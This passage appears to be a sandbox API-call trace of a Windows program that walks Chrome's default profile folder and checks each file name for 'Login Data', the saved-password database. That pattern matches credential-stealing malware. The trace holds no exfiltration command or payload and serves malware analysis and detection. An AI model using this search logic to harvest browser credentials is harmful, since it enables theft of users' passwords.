RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a6c0) returned 0x54 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a6c0 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392bf70 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x1d8 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0162.854] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp")) returned 1 [0162.854] VirtualQuery (in: lpAddress=0x925618, lpBuffer=0x2df2cc, dwLength=0x1c | out: lpBuffer=0x2df2cc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.854] GetProcessHeap () returned 0x8e0000 [0162.854] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925618 | out: hHeap=0x8e0000) returned 1 [0162.854] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.854] GetProcessHeap () returned 0x8e0000 [0162.854] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.855] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x825f0410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Action Predictor", cAlternateFileName="NETWOR~1")) returned 1 [0162.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.855] lstrlenW (lpString="\\") returned 1 [0162.855] GetProcessHeap () returned 0x8e0000 [0162.855] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.855] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.855] lstrlenW (lpString="Network Action Predictor") returned 24 [0162.855] GetProcessHeap () returned 0x8e0000 [0162.855] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xca) returned 0x8fcdb8 [0162.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.855] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Network Action Predictor" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" [0162.855] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.855] GetProcessHeap () returned 0x8e0000 [0162.855] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.855] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor", lpSrch="Login Data") returned 0x0 [0162.855] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.855] GetProcessHeap () returned 0x8e0000 [0162.855] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0162.855] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8262ad90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Action Predictor-journal", cAlternateFileName="NETWOR~2")) returned 1 [0162.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.855] lstrlenW (lpString="\\") returned 1 [0162.855] GetProcessHeap () returned 0x8e0000 [0162.855] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.855] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.855] lstrlenW (lpString="Network Action Predictor-journal") returned 32 [0162.855] GetProcessHeap () returned 0x8e0000 [0162.855] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925550 [0162.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.856] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Network Action Predictor-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" [0162.856] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.856] GetProcessHeap () returned 0x8e0000 [0162.856] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.856] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal", lpSrch="Login Data") returned 0x0 [0162.856] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.856] GetProcessHeap () returned 0x8e0000 [0162.856] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.856] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86263d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86263d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86263d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Persistent State", cAlternateFileName="NETWOR~3")) returned 1 [0162.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.856] lstrlenW (lpString="\\") returned 1 [0162.856] GetProcessHeap () returned 0x8e0000 [0162.856] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.856] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.856] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.856] lstrlenW (lpString="Network Persistent State") returned 24 [0162.856] GetProcessHeap () returned 0x8e0000 [0162.856] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xca) returned 0x8fcdb8 [0162.856] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.856] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Network Persistent State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" [0162.856] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.856] GetProcessHeap () returned 0x8e0000 [0162.856] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.856] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State", lpSrch="Login Data") returned 0x0 [0162.856] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.856] GetProcessHeap () returned 0x8e0000 [0162.856] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0162.856] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x94034050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin Bound Certs", cAlternateFileName="ORIGIN~1")) returned 1 [0162.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.856] lstrlenW (lpString="\\") returned 1 [0162.856] GetProcessHeap () returned 0x8e0000 [0162.857] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.857] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.857] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.857] lstrlenW (lpString="Origin Bound Certs") returned 18 [0162.857] GetProcessHeap () returned 0x8e0000 [0162.857] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbe) returned 0x925550 [0162.857] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Origin Bound Certs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" [0162.857] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.857] GetProcessHeap () returned 0x8e0000 [0162.857] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.857] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs", lpSrch="Login Data") returned 0x0 [0162.857] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.857] GetProcessHeap () returned 0x8e0000 [0162.857] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.857] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9405a1b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin Bound Certs-journal", cAlternateFileName="ORIGIN~2")) returned 1 [0162.857] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.857] lstrlenW (lpString="\\") returned 1 [0162.857] GetProcessHeap () returned 0x8e0000 [0162.857] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.857] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.857] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.858] lstrlenW (lpString="Origin Bound Certs-journal") returned 26 [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fcdb8 [0162.858] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.858] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Origin Bound Certs-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" [0162.858] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.858] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal", lpSrch="Login Data") returned 0x0 [0162.858] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0162.858] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c43f3e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c446910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferences", cAlternateFileName="PREFER~1")) returned 1 [0162.858] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.858] lstrlenW (lpString="\\") returned 1 [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.858] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.858] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.858] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.858] lstrlenW (lpString="Preferences") returned 11 [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x925550 [0162.858] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.858] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Preferences" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" [0162.858] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.858] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences", lpSrch="Login Data") returned 0x0 [0162.858] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.858] GetProcessHeap () returned 0x8e0000 [0162.858] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.858] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8dea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8dea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="previews_opt_out.db", cAlternateFileName="PREVIE~1.DB")) returned 1 [0162.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.859] lstrlenW (lpString="\\") returned 1 [0162.859] GetProcessHeap () returned 0x8e0000 [0162.859] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.859] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.859] lstrlenW (lpString="previews_opt_out.db") returned 19 [0162.859] GetProcessHeap () returned 0x8e0000 [0162.859] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925550 [0162.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 